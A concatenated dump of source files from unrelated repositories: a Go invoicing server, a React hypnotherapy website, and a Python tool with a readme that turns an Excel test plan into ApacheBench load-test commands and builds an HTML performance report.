if err != nil {
log.Fatal(err)
}
db = session.DB("invoice")
app.GET("/", func(c *gin.Context) {
c.String(200, "Welcome to Invoicing App")
})
app.POST("/register", Register)
app.POST("/login", Login)
app.POST("/invoices", CreateInvoice)
app.GET("/invoices/user/:userId", GetAllInvoiceOfAUser)
app.GET("/invoices/user/:userId/:invoiceId", GetOneInvoiceOfAUser)
_ = app.Run(":3128")
}
| 30be70d19393beebf1f1eaf481f414d52372699f | [
"Markdown",
"Go"
] | 4 | Go | cyantarek/go-vue-invoice-app | 63d86fcde6d7596edb40c17111fb8349e553439a | d2bf3d770f252bd222ff163cb6efd7d89c333573 |
refs/heads/master | <repo_name>harryjms/hypnotherapy-website<file_sep>/src/Components/App/index.jsx
import React from 'react';
import { ThemeProvider } from 'react-jss';
import theme from '../../Theme/index.js';
import { BrowserRouter as Router, Route, Link, Switch } from 'react-router-dom';
import Header from '../Layout/Header.jsx';
// PAGES
import Error404 from '../../Pages/Errors/404.jsx';
import Home from '../../Pages/Home/index.jsx';
class App extends React.Component {
constructor(props) {
super(props);
}
render() {
return (
<ThemeProvider theme={theme}>
<Router>
<React.Fragment>
<Header />
<Switch>
<Route exact path="/" component={Home} />
<Route component={Error404} />
</Switch>
</React.Fragment>
</Router>
</ThemeProvider>
);
}
}
export default App;
<file_sep>/src/Pages/Errors/404.jsx
import React from "react";
import Content from "../../Components/Layout/Content.jsx";
class Error404 extends React.Component {
constructor(props) {
super(props);
}
render() {
return <Content>Error 404</Content>;
}
}
export default Error404;
<file_sep>/src/Components/Icons/menu/index.jsx
import React from 'react';
class IconMenu extends React.Component {
constructor(props) {
super(props);
}
render() {
const { size, color, ...rest } = this.props;
return (
<svg
xmlns="http://www.w3.org/2000/svg"
width={size || 24}
height={size || 24}
viewBox="0 0 24 24"
{...rest}
>
<path d="M0 0h24v24H0z" fill={color || 'none'} />
<path d="M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z" />
</svg>
);
}
}
export default IconMenu;
<file_sep>/src/Components/Layout/Content.jsx
import React from 'react';
import injectSheet from 'react-jss';
import { combineClasses } from '../../Utils/jss.js';
const styles = theme => ({
content: {
maxWidth: 960,
width: '100%',
margin: '0 auto',
},
});
class Content extends React.Component {
constructor(props) {
super(props);
}
render() {
const { classes, className, style } = this.props;
return (
<div className={combineClasses(classes.content, className)} style={style}>
{this.props.children}
</div>
);
}
}
export default injectSheet(styles)(Content);
<file_sep>/src/Components/Layout/Header.jsx
import React from 'react';
import injectSheet from 'react-jss';
import { Link, withRouter } from 'react-router-dom';
import { combineClasses } from '../../Utils/jss';
import IconMenu from '../Icons/menu/index.jsx';
import logo from '../../../assets/images/logo.png';
import Content from './Content.jsx';
const styles = theme => ({
link: theme.link,
topBar: {
padding: 5,
backgroundColor: theme.colours.accent,
color: theme.colours.darkPink,
textAlign: 'right',
},
topBarItem: {
display: 'inline-block',
marginLeft: 20,
fontSize: '10pt',
},
appBar: {
padding: '40px 0px',
display: 'flex',
alignItems: 'center',
},
burgerMenu: {
display: 'none',
position: 'absolute',
top: 40,
left: 10,
fill: theme.colours.darkPink,
},
logo: {
width: 100,
},
logo_img: {
width: '100%',
},
navigation: {
display: 'flex',
},
navItem: {
...theme.link,
flex: 1,
fontWeight: 'bold',
marginLeft: 40,
'&:hover:after': {
...theme.link['&:hover:after'],
borderWidth: 2,
},
},
'@media (max-width: 760px)': {
appBar: {
flexDirection: 'column',
justifyContent: 'space-around',
},
burgerMenu: {
display: 'block',
},
navigation: {
flexDirection: 'column',
textAlign: 'center',
marginTop: 20,
width: '100%',
display: 'none',
},
navigationOpen: {
display: 'flex',
},
navItem: {
marginLeft: 0,
padding: '10px 0',
width: '100%',
'-webkit-tap-highlight-color': 'transparent',
'&:hover': {
backgroundColor: theme.colours.accent,
color: 'white',
},
'&:after': {
display: 'none',
},
},
},
});
class Header extends React.Component {
constructor(props) {
super(props);
this.state = {
menuOpen: false,
};
}
componentWillReceiveProps(nextProps) {
if (nextProps.location.pathname !== this.props.location.pathname) {
this.setState({ menuOpen: false });
}
}
render() {
const { classes } = this.props;
return (
<React.Fragment>
<div className={classes.topBar}>
<Content>
<div className={classes.topBarItem}>T 07909 042010</div>
<div className={classes.topBarItem}>
E{' '}
<a
href="mailto:<EMAIL>"
className={classes.link}
>
<EMAIL>
</a>
</div>
</Content>
</div>
<Content className={classes.appBar}>
<IconMenu
className={classes.burgerMenu}
size={24}
title="Menu"
onClick={() =>
this.setState(prevState => ({ menuOpen: !prevState.menuOpen }))
}
/>
<div className={classes.logo}>
<img src={logo} className={classes.logo_img} />
</div>
<div
className={combineClasses(
classes.navigation,
this.state.menuOpen && classes.navigationOpen,
)}
>
<Link to="/" className={classes.navItem}>
Home
</Link>
<Link to="/about" className={classes.navItem}>
About
</Link>
<Link to="/information" className={classes.navItem}>
Information
</Link>
<Link to="/faq" className={classes.navItem}>
FAQ
</Link>
<Link to="/treatments" className={classes.navItem}>
Treatments
</Link>
<Link to="/prices" className={classes.navItem}>
Prices
</Link>
</div>
</Content>
</React.Fragment>
);
}
}
export default withRouter(injectSheet(styles)(Header));
<file_sep>/src/Theme/index.js
import colours from './colours';
import borders from './borders';
import link from './link';
const theme = {
colours,
borders,
link,
};
export default theme;
<file_sep>/src/Components/Icons/index.jsx
import IconMenu from './menu/index.jsx';
export default { IconMenu };
| 7981c3515d0ce73a30ac705c34053efa8c875c55 | [
"JavaScript"
] | 7 | JavaScript | harryjms/hypnotherapy-website | 90dafcd16ec30a13b29b11bd5f802fd8d8f61f7b | 900e005e8d0d6fec05c7d4a01f673bc2b7da645f |
refs/heads/main | <repo_name>Zekylly/ApacheBenchmarkAPITestTool<file_sep>/Common/Exceter.py
# -*- coding: utf-8 -*-
import os
import datetime
import xlrd
# def requests_by_duration(continue_time_seconds,concurrency_threads,info_level=1,headers_type="",header_array=[],api_address="",output_path=""):
# cmd_list=[]
# for threads in concurrency_threads.split("|"):
# cmd_content="ab"+" -t "+str(continue_time_seconds)+" -c " +str(threads)
# cmd_content=cmd_content+" -v "+str(info_level)
# if len(headers_type)>0:
# cmd_content = cmd_content + " -T " + headers_type
# if len(header_array)>0:
# for header in header_array:
# cmd_content=cmd_content+" -H "+str(header)
# cmd_content=cmd_content+" "+str(api_address)
# if len(output_path)>0:
# cmd_content=cmd_content+" > "+os.path.abspath(os.path.dirname(os.path.dirname(__file__)))+"/TestResultFloder/"+\
# datetime.datetime.strftime(datetime.datetime.now(), '%m%d%H%M')+"_"+\
# api_address.split("/")[-2]+"_"+api_address.split("/")[-1]+\
# "_"+str(continue_time_seconds)+"t_"+str(threads)+"c.txt"
# # print (cmd_content.replace("\n",""))
# cmd_list.append(cmd_content.replace("\n",""))
# # print(os.popen(cmd_content).read())
# return cmd_list
# def requests_by_sum(sum_requests_times,user_threads,info_level=1,api_address="",output_path=""):
# cmd_content = "ab" + " -n " + str(sum_requests_times) + " -c " + str(user_threads)
# cmd_content = cmd_content + " -v " + str(info_level)
# cmd_content = cmd_content + " " + str(api_address)
# if len(output_path) > 0:
# cmd_content = cmd_content + " > " + str(output_path)+".txt"
# print(cmd_content)
# print(os.popen(cmd_contentent).read())
def get_plan_data():
date = xlrd.open_workbook("./TestPlan.xls")
table = date.sheet_by_name("Sheet1")
row_date_list = []
all_date_list = []
for row in range(1, table.nrows):
for col in range(0, table.ncols):
value = str(table.cell(row, col).value)
value = value.replace(".0", "").replace("./",
os.path.abspath(os.path.dirname(os.path.dirname(__file__))) + "/")
row_date_list.append(value)
# print(table.cell(row, col).value)
all_date_list.append(row_date_list)
row_date_list = []
# for i in all_date_list:
# print(i)
return all_date_list
def get_table_start_col():
date = xlrd.open_workbook("./TestPlan.xls")
date = xlrd.open_workbook("./TestPlan.xls")
table = date.sheet_by_name("Sheet1")
for row in range(0, table.nrows):
i = 0
for col in range(0, table.ncols):
if str(table.cell(row, col).value) == "测试接口地址":
table_start_col_flag = i
return table_start_col_flag
i += 1
def get_cmd_list(all_rows_list):
cmd_list = []
table_start_col_flag = get_table_start_col()
for row in all_rows_list:
concurrency_level = row[table_start_col_flag + 6].split("|")
row_cmd_list = []
for concurrency in concurrency_level:
# 初始化
row_cmd_content = ""
# -t/-n -c
if len(str(row[table_start_col_flag + 5])) < 1:
row_cmd_content += "ab" + " -t " + str(row[table_start_col_flag + 4]) + " -c " + str(concurrency)
else:
row_cmd_content += "ab" + " -n " + str(row[table_start_col_flag + 5]) + " -c " + str(concurrency)
# -v
row_cmd_content += " -v " + str(row[table_start_col_flag + 8])
# -k
if len(str(row[table_start_col_flag + 7])) > 0:
if str(row[table_start_col_flag + 7]).replace(" ", "") == "是":
row_cmd_content = row_cmd_content + " -k "
# -T
if len(str(row[table_start_col_flag + 2])) > 0:
row_cmd_content += " -T " + str(row[table_start_col_flag + 2])
# -p
if len(str(row[table_start_col_flag + 1])) > 0:
row_cmd_content += " -p "
row_cmd_content += os.path.abspath(os.path.dirname(os.path.dirname(__file__))) + "/JsonFile/"
row_cmd_content += str(row[table_start_col_flag + 1])
# -H
if len(str(row[table_start_col_flag + 3])) > 0:
header_str = ""
for i in str(row[table_start_col_flag + 3]).split("|"):
header_str += " -H " + i
row_cmd_content += header_str
#
row_cmd_content += " " + "\"" + str(row[table_start_col_flag + 0]) + "\""
result_file_floder_path = os.path.abspath(os.path.dirname(os.path.dirname(__file__))) + "/ResultFloder/" + \
datetime.datetime.strftime(datetime.datetime.now(), '%Y%m%d') + "/"
if not os.path.exists(result_file_floder_path):
os.makedirs(result_file_floder_path)
result_file_name = ""
if "?" in str(row[table_start_col_flag + 0]):
api_adress_last_line = str(row[table_start_col_flag + 0]).split("?")[0]
else:
api_adress_last_line = str(row[table_start_col_flag + 0])
result_file_name += str(api_adress_last_line.split("/")[-2]) + "_"
result_file_name += str(api_adress_last_line.split("/")[-1]) + "_"
if " -n " in row_cmd_content:
result_file_name += str(row[table_start_col_flag + 5]) + "n_" + str(concurrency) + "c"
else:
result_file_name += str(row[table_start_col_flag + 4]) + "t_" + str(concurrency) + "c"
if " -k " in row_cmd_content:
result_file_name += "_k_"
else:
result_file_name += "_"
result_file_name += datetime.datetime.strftime(datetime.datetime.now(), '%H%M') + ".txt"
# result_file_name += "2155.txt"
result_file_name += "sleep" + str(row[table_start_col_flag + 9])
row_cmd_content = row_cmd_content + " > " + result_file_floder_path + result_file_name
row_cmd_list.append(row_cmd_content)
cmd_list.append(row_cmd_list)
return cmd_list
def exec_cmd(cmd_str):
print("执行命令:" + cmd_str)
cmd_return_value = os.popen(cmd_str).read()
return cmd_return_value
def get_post_data(cmd_str_list):
json_file_path = ""
json_line = "无post数据"
for cmd in cmd_str_list:
if "-p " in cmd:
json_file_path = cmd.split("-p ")[1].split(" ")[0]
# print(json_file_path)
break
break
# json_file_path=os.path.abspath(os.path.dirname(os.path.dirname(__file__))) + "/JsonFile/"+json_file_path
if len(json_file_path) > 0:
json_line = ""
for line in open(json_file_path):
json_line += line + "</br>"
return json_line
# class jmeter:
# def requests(continue_time_seconds,user_threads,api_address):
# cmd_content="jmeter"+\
# " -t "+str(continue_time_seconds)+\
# " -c "+str(user_threads)+\
# " "+api_address
# print (cmd_content)
# print(os.popen(cmd_content).popenread())
# if __name__ == '__main__':
# # 获取 excel 中表格数据
# plan=get_plan_data()
# # 生成测试命令
# cmd_list=get_cmd_list(plan)
# # 执行测试命令
# for cmd in cmd_list:
# print("执行命令:\n"+cmd)
# # os.popen(cmd)
# #生成测试报告
#
#
#
#
#
# # .read())
<file_sep>/Main.py
import Common.Report
import Common.Exceter
import time
def wai_for_time(hours_min):
while (True):
h_m = time.strftime('%H%M', time.localtime());
if h_m.__eq__(hours_min):
print('等待时间%a到了,开始执行...', hours_min)
break
print('等待时间%a未到,继续等待5秒...', hours_min);
time.sleep(5)
if __name__ == '__main__':
for i in range(0, 1):
# wai_for_time("1612")
repo = Common.Report
exector = Common.Exceter
# 获取 excel 中表格数据
plan = exector.get_plan_data()
# 生成测试命令
cmd_list = exector.get_cmd_list(plan)
result_file_path_list = []
html = """"""
html += repo.generate_report_header(repo.get_current_datetime_str(), len(cmd_list)) # html头
index = 0
for row_cmd in cmd_list:
# 一个接口的提取Post数据
post_data_str = exector.get_post_data(row_cmd)
# 获取测试间隔时长
sleep_time = row_cmd[0].split("sleep")[1].replace(" ", "")
cmd_report_str = """"""
for cmd in row_cmd:
# 去除附带的sleep
cmd = cmd.split("sleep")[0]
# 执行一个接口(一行)不同并发的测试命令
exector.exec_cmd(cmd)
cmd_report_str += cmd.split("sleep")[0] + "</br>\n"
# 等待指定的间隔时长
if len(sleep_time) > 0:
print("等待" + sleep_time + "秒...")
time.sleep(int(sleep_time))
# 获取一个接口的每个测试结果
report_file_list = repo.get_report_file_list(row_cmd)
# 一个接口的html代码
index += 1
html += repo.generate_row_html(cmd_report_str, report_file_list, post_data_str, index)
html += Common.Report.generate_report_footer()
# 生成测试报告
repo.write_html(html)
# print(html)
print('####################')
print('###第' + str(i+1) + '次测试完成###')
print('####################')
<file_sep>/readMe.md
# Apache_BenchMark API Test Tool
### 一、前言
- 项目说明:本项目使用Apache_BenchMark(一下简称ab)测试工具,对<font color='red'>**单个**</font>接口进行压测,并输出测试结果。
- 最终效果:在表格中编写单接口压力测试用例,一键执行,逐次对表格内所有接口遍历执行,并输出测试报告。
- ab官网地址:http://httpd.apache.org/docs/2.0/programs/ab.html
### 二、环境
- python环境:python 3.6
- IDE:PyCharm
### 三、安装和使用
#### 1、克隆本项目到本地
```bash
git clone https://github.com/Zekylly/ApacheBenchmarkAPITestTool
```
#### 2、工程目录说明

#### 3、根据自己的接口,填写测试用例表格`TestPlan.xls`
##### 3.1、表格的各字段说明
- **测试接口名称**:填写接口名称,可自定义
- **接口说明**:填写接口名称,可自定义,主要方便标记
- **测试接口地址**:全部地址,包含`协议`、`ip或域名`、`端口号`、`接口`。格式例如:http://www.baidu.com:8080/get/weather
- **Post数据文件地址**:若接口为get请求,该字段为放空。若接口为post接口,则需要传入post数据体,以`.json`形式存储,默认选取路径为`项目/JsonFile/xxxx.json`
```json
{"pageNumber":1,"pageSize": 1,"type":1}
```
- **头文件类型(选填)**:即提交数据方式(enctype 属性),规定在发送到服务器之前应该如何对表单数据进行编码。
| 值 | 描述 |
| --------------------------------- | ------------------------------------------------------------ |
| application/x-www-form-urlencoded | 在发送前编码所有字符(默认) |
| multipart/form-data | 不对字符编码。在使用包含文件上传控件的表单时,必须使用该值。 |
| application/json | 作为请求头告诉服务端**消息主体是序列化的JSON字符串**。除低版本的IE,基本都支持。 |
| text/plain | 空格转换为 “+” 加号,但不对特殊字符编码。 |
- **头文件参数**:token等相关参数填写处。
- **测试时长(秒)**:与**测试次数**二选一,表示多用户并发测试持续时长
- **测试次数(请求总数)**:与**测试时长**二选一,表示多用户并发测试的总次数
- **并发数级别(|隔开)**:设置vu并发数,直接填写并发用户数,例如:10,表示程序将创建10个虚拟用户。若需要测10、20、50、100、1000个并发用户,则只需使用”|“隔开即可,例:10|20|50|100|1000
- **是否保持用户连接(-k,选填,默认否)**:Use HTTP KeepAlive feature。将http请求保持长连接,该配置可能会影响性能结果数据
- **日志级别(1~4,选填,默认为1)**:测试过程中的日志级别。1为默认,最少日志量,4为最高,最多日志量
- **间隔时长(不同并发的间隔时间,单位:秒)**:单多个并发数级别时,或有多个单接口串联测试时,为避免每次的测试互相干扰,设置每次测试完成后,该测试工具将time.sleep()的方式来等待服务器”降温“。
##### 3.2、get 请求
需保证测试用例表格中”**测试接口地址的**“的准确性,同时”**Post数据文件地址**“字段放空
##### 3.3、post 请求
编写`.json`文件放置目录:`项目/JsonFile/xxxx.json`,其余参考测试用例表格中”**Post数据文件地址**“

#### 4、执行测试
编写完成工程表格用例后,进入工程目录,执行main.py,执行过程中,查看PyCharm的Console输出栏,将输出执行日志。

#### 5、查看结果
打开./ReportFile目录下的测试报告,并使用浏览器打开,即可查看。
##### 5.1整体报告

##### 5.2测试命令及Post数据

##### 5.3关键数据结果

#### 6、注意事项
- 为避免接口报错而无法知晓,编写计划调试时,请先试用日志级别3进行测试,测试完成后,在`./ResultFloder/`目录下找到对应的测试结果,打开查看是否得到了正确的服务器Response。
- 测试报告中所有数据,均取自在工程各目录下各文件
- 尽量使用`.xls`格式文件编写TestPlan
- 该项目当前仅可测单接口,多接口数据参数化串联测试暂未实现
- 本项目依赖于ab工具测试结果,更多知识及参数请参考:
- https://www.drupal.org/docs/develop/profiling-drupal/apache-bench-ab
- https://www.cnblogs.com/gumuzi/p/5617232.html
- http://www.devside.net/wamp-server/load-testing-apache-with-ab-apache-bench
- http://www.it1352.com/708197.html
- https://www.w3ctech.com/topic/1746
<file_sep>/Common/Report.py
# -*- coding: utf-8 -*-
import os
import subprocess
import datetime
import time
from collections import deque
#
def collect_date(report_file_path, last_line=50):
file = open(report_file_path, "rb+")
test_result = {}
output = deque(file, last_line)
list1 = list(output)
result_data = ""
# 给定默认值
test_result['Server_Hostname'] = "NOT_GET_DATA"
test_result['Server_Port'] = "NOT_GET_DATA"
test_result['API_Path'] = "NOT_GET_DATA"
test_result['Document_Length'] = "NOT_GET_DATA"
test_result['User_Threads'] = "NOT_GET_DATA"
test_result['Test_Time_Taken'] = "NOT_GET_DATA"
test_result['Complete_Requests'] = "NOT_GET_DATA"
test_result['Failed_Requests'] = "NOT_GET_DATA"
test_result['Total_Transferred'] = "NOT_GET_DATA"
test_result['Requests_Per_Second'] = "NOT_GET_DATA"
test_result['Time_Per_Request_Sum'] = "NOT_GET_DATA"
test_result['Time_Per_Request'] = "NOT_GET_DATA"
test_result['Transfer_Rate'] = "NOT_GET_DATA"
test_result['Transfer_Rate_total'] = "NOT_GET_DATA"
test_result['Connect_Min'] = "NOT_GET_DATA"
test_result['Connect_Mean'] = "NOT_GET_DATA"
test_result['Connect_Sd'] = "NOT_GET_DATA"
test_result['Connect_Median'] = "NOT_GET_DATA"
test_result['Connect_Max'] = "NOT_GET_DATA"
test_result['Processing_Min'] = "NOT_GET_DATA"
test_result['Processing_Mean'] = "NOT_GET_DATA"
test_result['Processing_Sd'] = "NOT_GET_DATA"
test_result['Processing_Median'] = "NOT_GET_DATA"
test_result['Processing_Max'] = "NOT_GET_DATA"
test_result['Waiting_Min'] = "NOT_GET_DATA"
test_result['Waiting_Mean'] = "NOT_GET_DATA"
test_result['Waiting_Sd'] = "NOT_GET_DATA"
test_result['Waiting_Median'] = "NOT_GET_DATA"
test_result['Waiting_Max'] = "NOT_GET_DATA"
test_result['Total_Min'] = "NOT_GET_DATA"
test_result['Total_Mean'] = "NOT_GET_DATA"
test_result['Total_Sd'] = "NOT_GET_DATA"
test_result['Total_Median'] = "NOT_GET_DATA"
test_result['Total_Max'] = "NOT_GET_DATA"
test_result['50%'] = "NOT_GET_DATA"
test_result['66%'] = "NOT_GET_DATA"
test_result['75%'] = "NOT_GET_DATA"
test_result['80%'] = "NOT_GET_DATA"
test_result['90%'] = "NOT_GET_DATA"
test_result['95%'] = "NOT_GET_DATA"
test_result['98%'] = "NOT_GET_DATA"
test_result['50%'] = "NOT_GET_DATA"
test_result['99%'] = "NOT_GET_DATA"
test_result['100%'] = "NOT_GET_DATA"
for item in list1:
item_str = str(item).replace("b'", "").replace("\\n'", "")
if "Server Hostname:" in item_str:
test_result['Server_Hostname'] = item_str.replace("Server Hostname:", "").replace(" ", "")
if "Server Port:" in item_str:
test_result['Server_Port'] = item_str.replace("Server Port:", "").replace(" ", "")
if "Document Path:" in item_str:
test_result['API_Path'] = item_str.replace("Document Path:", "").replace(" ", "")
if "Document Length:" in item_str:
test_result['Document_Length'] = item_str.replace("Document Length:", "").replace(" ", "").replace("bytes",
"")
if "Concurrency Level:" in item_str:
test_result['User_Threads'] = item_str.replace("Concurrency Level:", "").replace(" ", "")
# if "Time taken for tests:" in item_str :
# test_result['Test_Time_Taken']=item_str.replace("Time taken for tests:","").replace(" ","")
if "Time taken for tests:" in item_str:
test_result['Test_Time_Taken'] = item_str.replace("Time taken for tests:", "").replace("seconds",
"").replace(" ", "")
if "Complete requests" in item_str:
test_result['Complete_Requests'] = item_str.replace("Complete requests:", "").replace(" ", "")
if "Failed requests:" in item_str:
test_result['Failed_Requests'] = item_str.replace("Failed requests:", "").replace(" ", "")
if "Total transferred:" in item_str:
test_result['Total_Transferred'] = item_str.replace("Total transferred:", "").replace("bytes", "").replace(
" ", "")
if "Requests per second:" in item_str:
test_result['Requests_Per_Second'] = item_str.replace("Requests per second:", "").replace("[#/sec] (mean)",
"").replace(" ",
"")
if "Time per request:" in item_str and "(mean)" in item_str:
test_result['Time_Per_Request_Sum'] = item_str.replace("Time per request:", "").replace("[ms] (mean)",
"").replace(" ", "")
if "Time per request:" in item_str and "across all concurrent requests)" in item_str:
test_result['Time_Per_Request'] = item_str.replace("Time per request:", "").replace(
"[ms] (mean, across all concurrent requests)", "").replace(" ", "")
if "Transfer rate:" in item_str and "received" in item_str:
test_result['Transfer_Rate'] = item_str.replace("Transfer rate:", "").replace("[Kbytes/sec] received",
"").replace(" ", "")
if "kb/s total" in item_str:
test_result['Transfer_Rate_total'] = item_str.replace(" ", "").replace("kb/s total",
"").replace(
" ", "")
if "Connect:" in item_str:
item_str_list = item_str \
.replace(" ", "|") \
.replace(" ", "|") \
.replace(" ", "|") \
.replace(" ", "|") \
.replace(" ", "|") \
.replace(" ", "|") \
.replace(" ", "|") \
.replace(" ", "|").split("|")
# print(item_str)
test_result['Connect_Min'] = item_str_list[1]
test_result['Connect_Mean'] = item_str_list[2]
test_result['Connect_Sd'] = item_str_list[3]
test_result['Connect_Median'] = item_str_list[4]
test_result['Connect_Max'] = item_str_list[5]
if "Processing:" in item_str:
item_str_list = item_str \
.replace(" ", "|") \
.replace(" ", "|") \
.replace(" ", "|") \
.replace(" ", "|") \
.replace(" ", "|") \
.replace(" ", "|") \
.replace(" ", "|") \
.replace(" ", "|").split("|")
test_result['Processing_Min'] = item_str_list[1]
test_result['Processing_Mean'] = item_str_list[2]
test_result['Processing_Sd'] = item_str_list[3]
test_result['Processing_Median'] = item_str_list[4]
test_result['Processing_Max'] = item_str_list[5]
if "Waiting:" in item_str:
item_str_list = item_str \
.replace(" ", "|") \
.replace(" ", "|") \
.replace(" ", "|") \
.replace(" ", "|") \
.replace(" ", "|") \
.replace(" ", "|") \
.replace(" ", "|") \
.replace(" ", "|").split("|")
test_result['Waiting_Min'] = item_str_list[1]
test_result['Waiting_Mean'] = item_str_list[2]
test_result['Waiting_Sd'] = item_str_list[3]
test_result['Waiting_Median'] = item_str_list[4]
test_result['Waiting_Max'] = item_str_list[5]
if "Total:" in item_str:
item_str_list = item_str \
.replace(" ", "|") \
.replace(" ", "|") \
.replace(" ", "|") \
.replace(" ", "|") \
.replace(" ", "|") \
.replace(" ", "|") \
.replace(" ", "|") \
.replace(" ", "|").split("|")
test_result['Total_Min'] = item_str_list[1]
test_result['Total_Mean'] = item_str_list[2]
test_result['Total_Sd'] = item_str_list[3]
test_result['Total_Median'] = item_str_list[4]
test_result['Total_Max'] = item_str_list[5]
if "50%" in item_str:
test_result['50%'] = item_str.replace("50%", "").replace(" ", "")
if "66%" in item_str:
test_result['66%'] = item_str.replace("66%", "").replace(" ", "")
if "75%" in item_str:
test_result['75%'] = item_str.replace("75%", "").replace(" ", "")
if "80%" in item_str:
test_result['80%'] = item_str.replace("80%", "").replace(" ", "")
if "90%" in item_str:
test_result['90%'] = item_str.replace("90%", "").replace(" ", "")
if "95%" in item_str:
test_result['95%'] = item_str.replace("95%", "").replace(" ", "")
if "98%" in item_str:
test_result['98%'] = item_str.replace("98%", "").replace(" ", "")
if "99%" in item_str:
test_result['99%'] = item_str.replace("99%", "").replace(" ", "")
if "100%" in item_str:
test_result['100%'] = item_str.replace("(longest request)", "").replace("100%", "").replace(" ", "")
# result_data+=(str(item).replace("b'", "").replace("\\n'", ""))
# print(result_data)
# for key, value in test_result.items():
# print(key + ": " + str(value))
return test_result
def generate_report_header(test_time, count_api):
header_str = """<!--这里是头部内容-->
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport"content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no">
<script type="text/javascript">
function showOrHide(divID,textID){
var targetDiv = document.getElementById(divID);
if (targetDiv){
if (targetDiv.style.display=='block'){
var old_content=document.getElementById(textID).innerHTML;
document.getElementById(textID).innerHTML=old_content.replace("隐藏",'查看');
targetDiv.style.display='none';
}else{
var old_content=document.getElementById(textID).innerHTML;
document.getElementById(textID).innerHTML=old_content.replace('查看',"隐藏");
targetDiv.style.display='block';
}
}
}
</script>
<title>测试报告</title>
</head>
<!--这里是测试信息-->
<body>
<div class="box">
<div class="table">
<div class="table-header"><strong>互勾单接口测试报告</strong></div>
<div class="table-box">
<div class="table-header-item">
<div class="table-header-item-title">测试信息</div>
<div class="table-header-list">
<div class="table-header-list-left">测试时间</div>
<div class="table-header-list-right">""" + test_time + """</div>
</div>
<div class="table-header-list">
<div class="table-header-list-left">测试目的</div>
<div class="table-header-list-right">对""" + str(count_api) + """个接口进行并发测试,提取测试数据,作为后续接口调优参考</div>
</div>
<div class="table-header-list">
<div class="table-header-list-left">测试方法</div>
<div class="table-header-list-right">在相同时间内或在相同的总请求数下,并发数逐级递增后,接口的性能状况。</div>
</div>
</div>
<!--这里是需要插入的接口测试结果-->
<div class="table-content">"""
return header_str + "\n"
def get_current_datetime_str():
return datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%d %H:%M:%S')
def generate_report_footer():
footer_str = """
</div>
<!--这里是参考链接-->
<div class="table-header-item table-margin-top-20">
<div class="table-header-item-title">参考链接</div>
<div class="table-header-list-auto">
<label style="word-break:break-all;word-wrap:break-word">
1)<a href="https://www.drupal.org/docs/develop/profiling-drupal/apache-bench-ab" target=_blank>https://www.drupal.org/docs/develop/profiling-drupal/apache-bench-ab</a> </br>
2)<a href="https://www.cnblogs.com/gumuzi/p/5617232.html" target=_blank>https://www.cnblogs.com/gumuzi/p/5617232.html</a> </br>
3)<a href="http://www.devside.net/wamp-server/load-testing-apache-with-ab-apache-bench" target=_blank>http://www.devside.net/wamp-server/load-testing-apache-with-ab-apache-bench</a> </br>
4)<a href="http://www.it1352.com/708197.html" target=_blank>http://www.it1352.com/708197.html</a> </br>
5)<a href="https://www.w3ctech.com/topic/1746" target=_blank>https://www.w3ctech.com/topic/1746</a> </br>
</label>
</div>
</div>
</div>
</div>
</body>
<!--这里是css-->
<style>
html,body{
margin: 0;
padding: 0;
height: 100%;
overflow: hidden;
overflow-y: scroll;
}
.box{
width: 100%;
height: 100%;
display: block;
}
.table{
display: flex;
flex-direction: column;
flex: 1;
margin: 20px;
border:1px solid black;
}
.table .table-header{
height: 50px;
display: flex;
align-items: center;
justify-content: center;
background-color: cornflowerblue;
color: white;
font-size:x-large;
}
.table .table-box{
padding: 15px;
display: flex;
flex-direction: column;
flex: 1;
background-color: gainsboro;
}
.table .table-box .table-header-item{
display: flex;
flex-direction: column;
height: auto;
}
.table-header-item-title {
display: flex;
align-items: center;
justify-content: center;
height: 40px;
width: 120px;
background-color: cornflowerblue;
border:1px solid black;
color:white;
}
.table .table-box .table-header-item .table-header-list {
display: flex;
flex-direction: row;
align-items: center;
height: 40px;
border:1px solid black;
}
.table-header-list-left {
display: flex;
justify-content: center;
align-items: center;
height: 40px;
width: 120px;
border-right:1px double black;
}
.table-header-list-right{
margin-left: 20px;
margin-right: 20px;
flex: 1;
}
.table .table-box .table-content {
margin-top: 15px;
flex: 1px;
}
.table-content-li {
padding-bottom: 15px;
display: block;
width: 100%;
overflow: scroll;
border:1px solid black;
background-color: white;
display:none
}
.table-content-li-header {
padding: 10px 20px 10px 20px;
background-color: cornflowerblue;
display: flex;
justify-content: flex-start;
align-items: center;
border:1px solid black;
border-bottom: white;
color: white;
}
.table-content-item {
margin:0 15px 0 15px;
height: auto;
background-color: #f0f0f0;
font-size:small
}
.table-content-item tr {
text-align: center;
width:fit-content;
}
.table-content-item tr td {
padding: 5px;
}
.table-margin-top-20 {
margin-top: 20px;
}
.table-header-list-auto {
padding: 10px;
display: flex;
flex-direction: row;
align-items: center;
flex-wrap: wrap;
height: auto;
white-space: normal;
border:1px solid black;
}
.table-tr-header {
margin: 15px 15px 0 15px;
padding: 5px 20px 5px 20px;
width: fit-content;
background-color: PowderBlue;
border:1px solid black;
}
.table-tr-foot {
margin: 0px 0px 0 15px;
width: fit-content;
border:1px solid black;
}
</style>
</html>"""
return footer_str + "\n"
def generate_row_html(cmd_str, result_file_path_list, json_str, index):
index = str(index)
result_dic = collect_date(result_file_path_list[0])
# print(result_file_path_list[0])
# print(result_dic)
# print(result_dic['API_Path'])
if result_dic['API_Path'] == "NOT_GET_DATA":
div_id = "NO_GET_DATA"
else:
div_id = result_dic['API_Path'].split("/")[-2] + "_" + result_dic['API_Path'].split("/")[-1]
api_info = result_dic['Server_Hostname'] + result_dic['API_Path']
test_cmd_list_str = cmd_str
part_one_api_info = """
<!--part_one_api_info-->
<!--这里是接口信息-->
<div id='interface_info' class="table-content-li-header" onclick="showOrHide('""" + div_id + """_""" + index + """','interface_info')">(点击查看)接口信息:""" + api_info + """</div>
<div id=\"""" + div_id + """_""" + index + """\" class="table-content-li" display="none">
<div id='cmd_title' class="table-tr-header" onclick="showOrHide('cmd_""" + div_id + """','cmd_title')">(点击查看)测试命令及Post数据</div>
<div id='cmd_""" + div_id + """' style="display:none">
<table class="table-content-item" border="1" cellspacing="0">
<tbody>
<tr>
<td rowspan=4 colspan=16 align="left">
""" + test_cmd_list_str.replace("/Users/panpan/Desktop/DDStudy/APItest/",
"./") + """
</td>
</tr>
<tr></tr><tr></tr><tr></tr>
<tr>
